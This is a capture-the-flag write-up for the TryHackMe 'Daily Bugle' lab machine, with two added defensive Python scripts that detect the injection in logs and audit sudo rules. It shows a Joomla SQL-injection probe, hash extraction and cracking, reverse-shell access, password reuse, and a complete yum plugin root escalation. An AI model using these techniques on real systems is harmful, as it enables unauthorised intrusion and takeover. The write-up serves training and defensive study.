TryHackMe - Daily Bugle - Writeup
Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
Nmap Scan
root@ip-10-10-110-161:~# nmap -sCV -A 10.10.157.125
Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-23 07:26 BST
Nmap scan report for ip-10-10-157-125.eu-west-1.compute.internal (10.10.157.125)
Host is up (0.00045s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (EdDSA)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open mysql MariaDB (unauthorized)
MAC Address: 02:DB:73:73:24:0D (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms ip-10-10-157-125.eu-west-1.compute.internal (10.10.157.125)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.20 seconds
Directory Scan
root@ip-10-10-110-161:~# gobuster dir -u http://10.10.157.125 -w /usr/share/wordlists/dirb/common.txt -x php,sh,txt,cgi,html,css,js,py
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.157.125
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,cgi,html,css,js,py,php,sh
[+] Timeout: 10s
===============================================================
2021/05/23 07:43:19 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.css (Status: 403)
/.hta.js (Status: 403)
/.hta.py (Status: 403)
/.hta.php (Status: 403)
/.hta.sh (Status: 403)
/.hta.txt (Status: 403)
/.hta.cgi (Status: 403)
/.hta.html (Status: 403)
/.htaccess (Status: 403)
/.htaccess.cgi (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.css (Status: 403)
/.htaccess.js (Status: 403)
/.htaccess.py (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.sh (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.css (Status: 403)
/.htpasswd.js (Status: 403)
/.htpasswd.py (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.cgi (Status: 403)
/administrator (Status: 301)
/bin (Status: 301)
/cache (Status: 301)
/cgi-bin/ (Status: 403)
/cgi-bin/.html (Status: 403)
/components (Status: 301)
/configuration.php (Status: 200)
/images (Status: 301)
/includes (Status: 301)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/LICENSE.txt (Status: 200)
/index.php (Status: 200)
/index.php (Status: 200)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/README.txt (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/templates (Status: 301)
/tmp (Status: 301)
/web.config.txt (Status: 200)
===============================================================
2021/05/23 07:43:24 Finished
===============================================================
Deploy
- Access the web server, who robbed the bank?
Answer: spiderman
Obtain user and root
- What is the Joomla version?
Navigate to http://10.10.157.125/language/en-GB/en-GB.xml; the version number is available there.
Answer: 3.7.0
Instead of using SQLMap, why not use a python script!
Joomla version 3.7.0 is vulnerable to SQL injection (CVE-2017-8917); the vulnerable parameter is list[fullordering].
http://10.10.157.125/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml'
As per the instructions, we are going to use joomblah.py.
root@ip-10-10-110-161:~/Exploit-Joomla# ./joomblah.py http://10.10.157.125
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: fb9j5_users
- Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
- Extracting sessions from fb9j5_session
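As an added example that is not part of the original writeup or of joomblah.py, here is a small Python detector for the injection pattern described above: it parses Apache access-log lines (the sample lines are constructed, modelled on the probe URL), normalises the query string, and flags any list[fullordering] value that is not a plain "<column> ASC|DESC" ordering clause.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (sample data, not taken from the target machine).
SAMPLE_LOG = """\
10.10.110.161 - - [23/May/2021:07:50:01 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' HTTP/1.1" 500 1542 "-" "python-requests/2.25"
10.10.110.161 - - [23/May/2021:07:50:02 +0100] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%27 HTTP/1.1" 500 1542 "-" "python-requests/2.25"
10.10.2.7 - - [23/May/2021:07:51:10 +0100] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8731 "-" "Mozilla/5.0"
10.10.2.7 - - [23/May/2021:07:51:11 +0100] "GET /administrator/index.php?option=com_fields&view=fields&list%5Bfullordering%5D=a.ordering+ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache combined log: client, ident, user, [time], "METHOD target proto", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# What a legitimate list[fullordering] value looks like: "<column> ASC|DESC"
LEGIT_ORDERING = re.compile(r'^[A-Za-z_][\w.]*\s+(ASC|DESC)$', re.IGNORECASE)
# Tokens that never belong in an ordering clause
SQL_TOKENS = re.compile(r"(updatexml|extractvalue|concat|select|union|sleep|'|\()", re.IGNORECASE)

def check_line(line):
    """Return a finding dict for a suspicious list[fullordering] value, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status = m.groups()
    # parse_qs percent-decodes keys and values, so list%5Bfullordering%5D and
    # list[fullordering] normalise to the same parameter name
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in params.get("list[fullordering]", []):
        if LEGIT_ORDERING.match(value.strip()):
            continue
        return {"src": src, "time": ts, "status": status,
                "component": params.get("option", ["?"])[0],
                "value": value,
                "sql_tokens": bool(SQL_TOKENS.search(value))}
    return None

def detect(log_text):
    """Run check_line over every line of an access log and collect the findings."""
    return [f for f in map(check_line, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```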
To answer the question I have to crack the hash; I used John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
It takes a long time to crack the hash. Meanwhile, take a look at the directories we brute-forced earlier: /administrator (Status: 301) returns the admin login page. Once John finishes, we have our password.
root@ip-10-10-110-161:~# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123 (?)
1g 0:00:12:13 DONE (2021-05-23 08:57) 0.001363g/s 63.84p/s 63.84c/s 63.84C/s sweet28..spaceship
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
- What is Jonah’s cracked password?
Answer: spiderman123
Now log in to the admin panel at http://10.10.157.125/administrator with username jonah. Next we need a reverse shell. Since we can’t upload a PHP file through the media upload, we have to look at other Joomla reverse-shell techniques.
I found a blog about getting a reverse shell from Joomla. Following it, navigate to the template customization, edit the template’s index.php and add the reverse shell.
After clicking Template Preview, you’ll get a shell back on your host machine.
root@ip-10-10-252-101:~# nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.2.53 34574 received!
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
09:14:39 up 51 min, 0 users, load average: 0.05, 0.05, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ whoami
whoami
apache
sh-4.2$
We got a shell, but we are not jjameson. Look at /var/www/html/configuration.php; it contains the MySQL password. Try logging in as jjameson with it.
sh-4.2$ su jjameson
su jjameson
Password: nv5uz9r3ZEDzVjNu
id
uid=1000(jjameson) gid=1000(jjameson) groups=1000(jjameson)
Yes! We got jjameson's password. Now spawn a proper shell with python -c 'import pty; pty.spawn("/bin/sh")' and get the user flag.
sh-4.2$ cat user.txt
cat user.txt
27a260fe3cba712cfdedb1c86d80442e
Now it’s time for the root flag. The very first thing I check is sudo -l, to see whether the current user may run any command with sudo. I saw that a package management tool, yum, is allowed.
sh-4.2$ sudo -l
sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
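As an added example, not part of the original writeup, a small Python audit that parses sudo -l output (the writeup's own output is embedded below as the sample input, with one constructed benign entry added) and flags rules that need no password or point at binaries GTFOBins documents as able to spawn a shell; the SHELL_CAPABLE list is a partial, hand-picked assumption.

```python
import re

# Sample sudo -l output: the writeup's output plus one constructed benign rule.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
    (root) /bin/cat /var/log/httpd/error_log
"""

# Partial list of binaries GTFOBins documents as shell-capable under sudo
# (assumption: a real audit would load the full GTFOBins dataset).
SHELL_CAPABLE = {"yum", "dnf", "rpm", "apt", "apt-get", "pip", "python", "python3",
                 "perl", "vim", "vi", "less", "more", "find", "awk", "env", "bash", "sh"}

# "(runas) TAG: TAG: command args"  ->  runas, tag block, command
ENTRY_RE = re.compile(r'^\s*\(([^)]*)\)\s*((?:\w+:\s*)*)(.+?)\s*$')

def parse_sudo_l(text):
    """Return [(runas, [tags], command)] from the 'may run' section of sudo -l."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if re.match(r'^User \S+ may run the following commands', line):
            in_cmds = True          # everything before this is Defaults noise
            continue
        m = ENTRY_RE.match(line) if in_cmds else None
        if m:
            runas, tags, cmd = m.groups()
            entries.append((runas, tags.replace(":", "").split(), cmd))
    return entries

def risky_entries(text):
    """Flag sudo rules a reviewer should look at, with the reasons."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        reasons = []
        if cmd == "ALL":
            reasons.append("unrestricted command")
        if "NOPASSWD" in tags:
            reasons.append("no password required")
        if binary in SHELL_CAPABLE:
            reasons.append("shell-capable binary (see GTFOBins)")
        if reasons:
            findings.append({"runas": runas, "command": cmd, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in risky_entries(SUDO_L_OUTPUT):
        print(f)
```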
I checked GTFOBins to see whether yum has a misconfiguration I can take advantage of; follow option (b) of the GTFOBins yum entry.
sh-4.2$ TF=$(mktemp -d)
TF=$(mktemp -d)
sh-4.2$ cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
sh-4.2$ cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
sh-4.2$ cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF
sh-4.2$ sudo yum -c $TF/x --enableplugin=y
sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# whoami
whoami
root
sh-4.2#
Yay! We got root. Now type cat /root/root.txt.
sh-4.2# cat /root/root.txt
cat /root/root.txt
eec3d53292b1821868266858d7fa6f79
sh-4.2#
Machine Link: Daily Bugle
Thanks for reading